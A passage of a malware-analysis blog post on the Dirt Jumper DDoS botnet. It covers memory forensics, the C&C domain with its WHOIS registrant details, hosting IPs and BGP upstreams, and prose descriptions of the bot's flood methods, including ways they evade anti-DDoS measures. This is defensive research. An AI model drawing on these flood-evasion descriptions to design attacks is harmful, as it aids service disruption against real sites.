<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRxkPKRn_2fo3XZqvEVaa8iFqjQu7zI1tWMS9KyrakpieVan08n2Ye7uVeNrjBQcC63Wrp3nJNcVI7qhxfeB5oAPuOnPH_Bf_HyFbiuwIBnIJI8VUHqGuZDdXkRPKSa7J6ZgF8vHDYZsN-/s1600/vad_dump.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRxkPKRn_2fo3XZqvEVaa8iFqjQu7zI1tWMS9KyrakpieVan08n2Ye7uVeNrjBQcC63Wrp3nJNcVI7qhxfeB5oAPuOnPH_Bf_HyFbiuwIBnIJI8VUHqGuZDdXkRPKSa7J6ZgF8vHDYZsN-/s640/vad_dump.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'vaddump' command</td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;">This command leaves approximately 950 files in the dump directory, one per VAD segment associated with PID 1900. Running 'strings' and grepping for 'http' yields two segments of interest.<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9DP-ydIH8joJ4nNadX-Q0CIt38kdPuYLh2pQPoP9gQ1NUsVt6s2gJCZUzj-yjk1mopY11agg6No9UnpR3AvgMDJ7ooHNsD9a1JajVoTN0RhdqC1hXdxP_pPNTUBHOHeMO-AT3nk4dGV5/s1600/vad_strings.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9DP-ydIH8joJ4nNadX-Q0CIt38kdPuYLh2pQPoP9gQ1NUsVt6s2gJCZUzj-yjk1mopY11agg6No9UnpR3AvgMDJ7ooHNsD9a1JajVoTN0RhdqC1hXdxP_pPNTUBHOHeMO-AT3nk4dGV5/s640/vad_strings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Examining VAD segments for the string "http"</td></tr>
</tbody></table><div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">In the image above, we see VAD segment '<b>svgtook.exe.23ce450.00400000-00dadfff.dmp</b>' referencing the same web sites seen in the dumped process, while '<b>svgtook.exe.23ce450.01420000-0151ffff.dmp</b>' shows references to the various DDoS target URLs received, as well as the C&C "http://asdaddddaaaa.com".</span><br />
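<div style="font-family: Verdana, sans-serif;">The 'strings | grep http' step above can be scripted so that every VAD segment is checked in one pass and each hit is tied back to the segment file it came from. The Python below is an added example written for this edit, not code from the original post or from Volatility. It reads whatever vaddump wrote to a directory; the three in-memory segments it ships with are constructed stand-ins (only the asdaddddaaaa.com C&C URL is taken from the analysis above, the other URLs are placeholders). It also recovers UTF-16LE strings, which a plain 'strings' run without '-el' would miss, and Windows stores many URLs that way.</div>

```python
import re
from pathlib import Path

# Constructed stand-ins for vaddump output (the real files are the raw bytes
# of each VAD range, named <exe>.<offset>.<start>-<end>.dmp). Only the
# asdaddddaaaa.com URL is from the post; the other URLs are placeholders.
CONSTRUCTED_SEGMENTS = {
    "svgtook.exe.23ce450.00400000-00dadfff.dmp":
        b"MZ\x90\x00\x03\x00\x00\x00"
        + b"http://www.example.com/\x00"              # stand-in "legitimate" site
        + b"\xff\x12\x00"
        + b"https://update.example.invalid/\x00"
        + b"httpsend_s\x00",                           # the odd string noted above
    "svgtook.exe.23ce450.01420000-0151ffff.dmp":
        b"\x00\x00\x00GET /678/index.php HTTP/1.1\r\n"
        + b"http://asdaddddaaaa.com/678/index.php\x00\x00"   # C&C URL from the post
        + "http://victim.example.invalid/".encode("utf-16-le")  # wide-string task
        + b"\x00\x00no url here\x00",
    "svgtook.exe.23ce450.7ffd0000-7ffdffff.dmp":
        b"\x01\x02\x03abcdefgh\x00",                     # nothing of interest
}


def extract_strings(data: bytes, min_len: int = 4):
    """Yield printable runs the way `strings` does: ASCII runs (strings -a)
    and UTF-16LE runs (strings -el). Runs shorter than min_len are dropped."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(data):
        yield m.group().decode("ascii")
    for m in wide_re.finditer(data):
        yield m.group().decode("utf-16-le")


def grep_segments(segments: dict, needle: str = "http") -> dict:
    """Map each segment name to its sorted, de-duplicated strings containing
    needle (case-sensitive, like `strings | grep http`). Segments without a
    hit are omitted so only the ranges worth opening are reported."""
    hits = {}
    for name, data in segments.items():
        found = sorted({s for s in extract_strings(data) if needle in s})
        if found:
            hits[name] = found
    return hits


def load_vaddump_dir(dump_dir: str) -> dict:
    """Read every *.dmp file vaddump wrote for one PID into memory."""
    return {p.name: p.read_bytes() for p in sorted(Path(dump_dir).glob("*.dmp"))}


if __name__ == "__main__":
    for name, urls in grep_segments(CONSTRUCTED_SEGMENTS).items():
        print(name)
        for url in urls:
            print("   ", url)
```

<div style="font-family: Verdana, sans-serif;">For a real case, pass the result of load_vaddump_dir() on the vaddump output directory to grep_segments(); the segment names in the report carry the same start-end address ranges shown in the screenshot, so a hit can be opened directly in a hex viewer. Because the match is case-sensitive, the request line "GET ... HTTP/1.1" in the second segment is not reported; drop the case (or pass needle="HTTP") if you also want request headers.</div>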
<div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span></div></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">So in this brief analysis, we have been able to utilize Volatility to quickly extract key information about the running Dirt Jumper process. This also equips us to further investigate this process, as well as how other Windows processes may be affected. For example, Volatility allows for extensive registry carving and analysis as well as the use of plugins specifically designed for <a href="http://code.google.com/p/volatility/wiki/CommandReference#Malware_and_Rootkits">analyzing malicious code</a>.</span></div><div style="font-family: Verdana,sans-serif;"><br />
<hr /><span style="font-size: large;"><b>3. Command & Control servers </b></span><br />
<span style="font-size: large;"><b>MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB </b></span><span style="font-size: large;"><b></b></span><br />
<span style="font-size: large;"><b><br />
</b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"> </span></div><div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;">Upon execution, Dirt Jumper sample f29b1089b3f5e076d4d4bd2a3a02d3cb attempted DNS resolution for the domain, asdaddddaaaa.com.</span></div><div style="font-family: Verdana, sans-serif;">The domain registration information for asdaddddaaaa.com is: </div><blockquote style="font-family: Verdana,sans-serif;"><div><span class="Apple-style-span" style="font-size: small;">Domain Name: ASDADDDDAAAA.COM</span></div><div><span class="Apple-style-span" style="font-size: small;">Registrar: BIZCN.COM, INC.</span></div><div><span class="Apple-style-span" style="font-size: small;">Whois Server: whois.bizcn.com</span></div><div><span class="Apple-style-span" style="font-size: small;">Referral URL: http://www.bizcn.com</span></div><div><span class="Apple-style-span" style="font-size: small;">Name Server: NS1.FREEDNS.WS</span></div><div><span class="Apple-style-span" style="font-size: small;">Name Server: NS2.FREEDNS.WS</span></div><div><span class="Apple-style-span" style="font-size: small;">Status: clientDeleteProhibited</span></div><div><span class="Apple-style-span" style="font-size: small;">Status: clientTransferProhibited</span></div><div><span class="Apple-style-span" style="font-size: small;">Updated Date: 19-jun-2011</span></div><div><span class="Apple-style-span" style="font-size: small;">Creation Date: 18-feb-2011</span></div><div><span class="Apple-style-span" style="font-size: small;">Expiration Date: 18-feb-2012</span></div><div><span class="Apple-style-span" style="font-size: small;">Registrant Contact:</span></div><div><span class="Apple-style-span" style="font-size: small;">Mark Livingston</span></div><div><span class="Apple-style-span" style="font-size: small;">Mark Livingston j.hnvns.92@gmail.com</span></div><div><span class="Apple-style-span" style="font-size: 
small;">+1.2147899961 fax: +1.2147899961</span></div><div><span class="Apple-style-span" style="font-size: small;">446 Ridge Point drive</span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span"> Forney TX 75126</span><span class="Apple-style-span"> </span></span></div></blockquote></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;">As of this writing, DNS results show that the C&C is running on IP address 195.3.145.87, which is managed by Altnet-Latvia (ASN41390). </span>There are several other domains and nameservers running on that IP address, including: </span><br />
<div></div><ul><li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">bestdumps.biz</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">lost-pass.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">mail.asdaddddaaaa.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">mittmax.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns1.euro-2012portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns1.euro2012-portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns2.euro-2012portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns2.euro2012-portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">open-pass.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">pizdaruliu.net</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">skachatiskype.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">skype4download.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.mittmax.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.skype-rf.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.skype4download.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">xaker.me </span></li>
</ul><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Prior to hosting on Altnet-Latvia (ASN41390), asdaddddaaaa.com was utilizing the following IP addresses and providers for its domain hosting:</span><br />
<div></div><ul><li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.57 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.60 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.72 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.130.141 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.130.150 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.5 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.7 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.9 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">94.244.80.217 - AS25190 - Kauno Interneto Sistemos - Lithuania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">95.64.50.30 - AS48266 - Netserv Consult - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">141.136.16.100 - AS50515 - TIER-DATA-CENTER - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">223.25.242.107 - AS55720 - GIGABIT- Malaysia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">223.25.242.196 - AS55720 - GIGABIT- Malaysia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">195.3.145.87 - AS41390 - RN-DATA - Latvia</span></li>
</ul><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">It is often interesting to trace the routing information of the hosting provider in question. The diagram below was produced using BGPlay, which displays the routing information for a network prefix over a defined time period. In this case, I ran BGPlay for the prefix 195.3.144.0/22 from 09/9/2011 through 10/9/2011. From the results, you can see that during this time, Altnet-Latvia had Telenet SIA in Latvia (ASN24589) as its only upstream. Walking "up the upstream", we see the following relationships:</span><br />
<div style="font-family: Verdana, sans-serif;"><br />
</div></div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"> </span> </div><div style="font-family: Verdana, sans-serif;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSBsSwhekP90fMgaWi4tcCiVd_GfPYXAqZR7ACKZu2wW_3ahMG3_WnLfmT8bqN6LmQC9mKyM_2G0q6ncS2ZnWWX2erAfHiZIRvsjs45sRMvvRC1C3CFbsZ-lZqfdTDMYjsSDD1_jdHD3o/s1600/bgp.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSBsSwhekP90fMgaWi4tcCiVd_GfPYXAqZR7ACKZu2wW_3ahMG3_WnLfmT8bqN6LmQC9mKyM_2G0q6ncS2ZnWWX2erAfHiZIRvsjs45sRMvvRC1C3CFbsZ-lZqfdTDMYjsSDD1_jdHD3o/s640/bgp.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">BGPlay information for Altnet-Latvia (AS41390)</td></tr>
</tbody></table><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> </span></span></span></div><div style="font-family: Verdana, sans-serif;"><div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> Telenet SIA (ASN24589) is the sole upstream for Altnet-Latvia</span></span></span></div></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">BKCNet Latvia (ASN6851) is the sole upstream for Telenet SIA</span></span></span></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">Telia Latvija (ASN5518) is the sole upstream for BKCNet Latvia</span></span></span></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">TeliaNet Sweden (ASN1299) is the sole upstream for Telia Latvija</span></span></span><br />
<span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"><br />
</span></span></span></div><div style="text-align: left;"><span style="font-size: small;"> </span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FqtZErzgb5prI3C4zWTgf9vf3sarvLaUi1eneldr3U_1qfs23HVJNDHEQTA21YRrWxlJhVjVRq2PcW_VLTIfFxdgCvp27IpiclYzM71_3r3w-1rnFhY2nZyBDV-1cEqF2Ac5xjp52bgj/s1600/routeviews.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FqtZErzgb5prI3C4zWTgf9vf3sarvLaUi1eneldr3U_1qfs23HVJNDHEQTA21YRrWxlJhVjVRq2PcW_VLTIfFxdgCvp27IpiclYzM71_3r3w-1rnFhY2nZyBDV-1cEqF2Ac5xjp52bgj/s1600/routeviews.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Routeviews BGP Information for IP 195.3.145.87</span></td></tr>
</tbody></table><div style="text-align: left;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> </span></span></span></div></div><div><span style="font-family: Verdana,sans-serif; font-size: small;">Based on additional research I did, it's very clear that this Dirt Jumper C&C isn't the only malicious activity on Altnet-Latvia.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://www.phishtank.com/asn_search.php?asn=41390&valid=All&active=All&Search=Search">PhishTank Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL107154">Spamhaus Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://malc0de.com/database/index.php?search=41390&ASN=on">malc0de Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;">I wonder if the folks at TeliaNet Sweden, or the other upstreams to Altnet-Latvia, are aware of this? This would also be a good time to remind hosting providers, ISPs, and network operators to subscribe to the <a href="http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork">Shadowserver ASN & Netblock Reporting Service.</a> </span><b> </b></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
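<div style="font-family: Verdana, sans-serif;">The "walking up the upstream" exercise is a graph walk over observed AS_PATH attributes: in each path the origin AS is rightmost, and the AS immediately to its left is the neighbour that carried the route onward. The Python below is an added example written for this edit, not code from the original post or from BGPlay. The AS paths it works on are constructed; the chain from AS41390 up to AS1299 matches the one reported above for 195.3.144.0/22, while the ASes to the left of 1299 are invented collector peers, and one path carries AS prepending to show it being collapsed.</div>

```python
from collections import defaultdict

# Constructed AS_PATH observations in the form a route collector (Routeviews,
# RIPE RIS) shows them for a prefix. The 41390 <- 24589 <- 6851 <- 5518 <- 1299
# chain matches the post; 7018/3356/2914/6939 are invented collector peers.
CONSTRUCTED_AS_PATHS = [
    "7018 1299 5518 6851 24589 41390",
    "3356 1299 5518 6851 24589 24589 41390",   # 24589 prepended itself once
    "2914 1299 5518 6851 24589 41390",
    "6939 1299 5518 6851 24589 41390",
]


def upstreams_from_paths(paths):
    """Return {asn: set of ASes seen immediately to its left in any path}.
    The left neighbour is the AS that announced the route onward, i.e. the
    observed upstream of the AS to its right."""
    up = defaultdict(set)
    for path in paths:
        hops = []
        for asn in path.split():
            if not hops or hops[-1] != asn:     # collapse prepending (24589 24589)
                hops.append(asn)
        for left, right in zip(hops, hops[1:]):
            up[right].add(left)
    return up


def walk_sole_upstreams(up, origin):
    """Climb from origin while every AS on the way has exactly one observed
    upstream; stop at the first AS that has several (or none). The returned
    list is the chain of sole upstreams, nearest first."""
    chain, current, seen = [], origin, {origin}
    while len(up.get(current, ())) == 1:
        (nxt,) = up[current]
        if nxt in seen:                         # defensive: looped/malformed path
            break
        chain.append(nxt)
        seen.add(nxt)
        current = nxt
    return chain


if __name__ == "__main__":
    adjacency = upstreams_from_paths(CONSTRUCTED_AS_PATHS)
    print("41390 ->", " -> ".join(walk_sole_upstreams(adjacency, "41390")))
```

<div style="font-family: Verdana, sans-serif;">Two caveats apply when this is run against real collector data. A left neighbour is only an observed adjacency, which can be a settlement-free peer rather than a paid transit provider, so "sole upstream" means "only AS through which this collector ever saw the prefix", not a contractual claim. And a single snapshot from one collector is a partial view; that is why the post used BGPlay over a month-long window rather than one table dump.</div>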
<span style="font-family: Verdana,sans-serif;"><b><span class="Apple-style-span" style="font-size: large;"><u>DDoS Victims</u></span></b> </span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;">This is a very active DDoS bot, with a wide variety of targets across many industries. Over a two week observation period, the asdaddddaaaa.com controller has targeted victims in the following industries: </span><br />
<div style="font-family: Verdana, sans-serif;"></div><ul style="font-family: Verdana, sans-serif;"><li><span style="font-size: small;">Aviation Products and Services</span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUaWQxV-U8xt2sICagpT7LSX0JOaqq_XQVJcQXN0DPcVSVu9NVZBdaBpNsroDd_IsI7QDrz56sDKMekMxznour7ZTlCseg-Gq27fkzjLzGDpwkYekE2DyppPhQvAuxjVNT6kjfyAfIMKKd/s1600/AllSites.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUaWQxV-U8xt2sICagpT7LSX0JOaqq_XQVJcQXN0DPcVSVu9NVZBdaBpNsroDd_IsI7QDrz56sDKMekMxznour7ZTlCseg-Gq27fkzjLzGDpwkYekE2DyppPhQvAuxjVNT6kjfyAfIMKKd/s400/AllSites.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> <span style="font-size: x-small;"><span style="color: black; font-size: x-small;"><span style="font-family: Arial; font-size: x-small;">Host-tracker.com showing problems<br />
experienced by targeted domains</span></span></span></td></tr>
</tbody></table></li>
<li><span style="font-size: small;">Porn sites </span></li>
<li><span style="font-size: small;">Cargo and Shipping </span></li>
<li><span style="font-size: small;">Jewelry </span></li>
<li><span style="font-size: small;">Auto Dealer Services </span></li>
<li><span style="font-size: small;">Real Estate </span></li>
<li><span style="font-size: small;">Wholesale Shopping</span></li>
<li><span style="font-size: small;">Audio Products </span></li>
<li><span style="font-size: small;"> Classified ad sites </span></li>
<li><span style="font-size: small;">Office Space providers </span></li>
<li><span style="font-size: small;">Online Forex Trading </span></li>
<li><span style="font-size: small;">Clothing and Gifts </span></li>
</ul></div><div><span style="font-family: Verdana,sans-serif; font-size: small;"><br />
</span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;">As described in more detail later in this post, we have detected several other C&Cs that appear to be related to the same group operating asdaddddaaaa.com. Several of them continue to actively initiate DDoS attacks. We are currently monitoring these controllers and sharing the victim lists with appropriate law enforcement agencies and the victim organizations.</span><br />
<div style="font-family: Verdana, sans-serif;"><br />
</div><hr style="font-family: Verdana, sans-serif;" /></div><div style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><b>4. Dirt Jumper current versions and general information</b></span><span style="font-size: small;"></span><br />
<br />
The bot binary is relatively large, 170-270 kB, and is packed with UPX. The bot tasks are not encrypted, as you can see in the pcaps and on the C&C server.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuQ6CgAh7e6gblCIF_9MRPsOM2bAmHDAdVGQech3IINbDfMqkAsDSALx8c19uos2MrBEEV8A4ze6HCg3XtqusUpqO3qd5x4QG2G6yPNLTi3QHyY5jw8KHuO5vQIh7hLebfuetPhsXXR7O/s1600/task.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuQ6CgAh7e6gblCIF_9MRPsOM2bAmHDAdVGQech3IINbDfMqkAsDSALx8c19uos2MrBEEV8A4ze6HCg3XtqusUpqO3qd5x4QG2G6yPNLTi3QHyY5jw8KHuO5vQIh7hLebfuetPhsXXR7O/s320/task.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DDoS task for bots as seen on a C&C page</td></tr>
</tbody></table><span class="Apple-style-span" style="font-size: large;"><b><u> </u></b></span><br />
<u><b><span class="Apple-style-span" style="font-size: large;">Current Dirt Jumper Versions and Features</span></b></u><br />
<br />
<span style="font-size: small;"><u><b>Version 3, "September", and private versions - 2011</b></u></span><br />
<b><u><br />
</u></b><br />
<ul><span style="font-size: small;">
<li><b>Multipurpose flood (Light) </b>– a combination attack in which packets with random data are sent to the server. The bot uses a varying User Agent <table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s1600/944djs.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s320/944djs.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Control Panel. Img.src: shopworld.biz</td></tr>
</tbody></table>and Referer, receives and sends cookies, builds packets of different lengths and content types, and varies the timeout and sending rate.</li>
<li><b>Multipurpose flood (Full)</b> – Same as Multipurpose flood (Light), but POST data is added. POST requests exhaust server resources because the server has to process the data, requiring participation of Apache, PHP, and any linked database. This also helps to evade anti-DDoS measures because it imitates random browser requests. </li>
<li><b>HTTP flood (DJSFlood)</b> – The author claims this method is unique to his bot. It is very similar to a simple HTTP flood, but the requests do not have a standard structure; the author calls it “something between http and udp”. This method can be used for port attacks. The syntax is http://IP:PORT/ with 300-500 threads.</li>
<li><b>POST flood (TimeOut) </b>- Same as above, but data can be sent using POST. There is a way to set a timeout for the response after sending the data.</li>
</span></ul><span style="font-size: small;">Other features</span><br />
<ul><span style="font-size: small;">
<li>Works with http, https</li>
<li>Varied User Agent and Referer </li>
<li>Multithreading, can attack up to 999 websites simultaneously</li>
<li>Can attack by IP, domain name, port, ftp</li>
<li>Access to the admin panel may be limited by IP. Additionally, the first level login page can be accessed only by specifying the correct GET-Passwd. The correct password then allows access to the next level, the regular login page.</li>
<li>Can attack up to 999 sites simultaneously </li>
</span></ul><span style="font-size: small;"><u><b><br />
</b></u></span><br />
<span style="font-size: small;"><u><b>Version 2 - 2010</b></u></span> <br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYINsuf-Yxf70uyVb5GRh7g-a5jqRxGjPovQDxbK6b8C5OcwjGQgqeYyshmci4ziAeMIvx3o70CUp_0hbDaKKGi4KcOydjMtNB6fAEFOe_3u2zvgDcX0yRg7RTm0SYKYg9fK3vl2b876/s1600/dj2.JPG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYINsuf-Yxf70uyVb5GRh7g-a5jqRxGjPovQDxbK6b8C5OcwjGQgqeYyshmci4ziAeMIvx3o70CUp_0hbDaKKGi4KcOydjMtNB6fAEFOe_3u2zvgDcX0yRg7RTm0SYKYg9fK3vl2b876/s320/dj2.JPG" width="320" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dirt Jumper v.2 Img.Src: Damagelab.org</span></td></tr>
</tbody></table><ul><span style="font-size: small;">
<li><b>HTTP flood:</b> This type of attack can cause server overload due to frequent, repeated conventional HTTP requests. As soon as the webserver is ready to answer, the bot breaks the connection and sends a new request </li>
<li><b>Synchronous flood:</b> This method of attack is effective only when more than 150 threads are in use. The bot makes 150+ simultaneous requests, waits until the server responds, and repeats </li>
<li><b>Downloading flood:</b> The bots download files from the website causing bandwidth saturation. </li>
<li><b>POST flood: </b> The bot can make GET and POST requests at the same time. That is, it can send random usernames and passwords to website forms, causing a tremendous load on the server </li>
</span></ul><span style="font-size: small;">Other features are the same as you see above in Version 3. </span><br />
<br />
<br />
<span style="font-size: small;"><u><b>Version 1 </b></u></span></div><div style="font-family: Verdana, sans-serif;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLKEczc5NLSZyeinVJmTtxfBBK5Y9yLphrZogat2okpfWVkI-GDCN1HA5-Fe9j7rld5IyDcmPHU6fIaWOm0ShukZvmfD3LtJma8YRLZxl1O5GSWdupgbcQpqlEghb0Tp0a9JCgDSL0CNR/s1600/DJ1.JPG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLKEczc5NLSZyeinVJmTtxfBBK5Y9yLphrZogat2okpfWVkI-GDCN1HA5-Fe9j7rld5IyDcmPHU6fIaWOm0ShukZvmfD3LtJma8YRLZxl1O5GSWdupgbcQpqlEghb0Tp0a9JCgDSL0CNR/s320/DJ1.JPG" width="320" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dirt Jumper v.1 Control Panel. Img.Src: xaknet.ru</span></td></tr>
</tbody></table><span style="font-size: small;">There is not much information about version 1 available. The one description found is the following:</span></div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"><b> </b></span> </div><ul style="font-family: Verdana, sans-serif;"><span style="font-size: small;">
<li>Multithreaded attack, number of threads can be changed without interrupting the attack</li>
<li>Can attack http, https</li>
<li>Can attack by DOMAIN:PORT </li>
<li>Can attack several sites at once</li>
<li>Can set the time at which the bot calls back</li>
<li>Can change User Agent</li>
<li>Bot is installed as a system service</li>
<li>The bot owner can choose the name of the bot process </li>
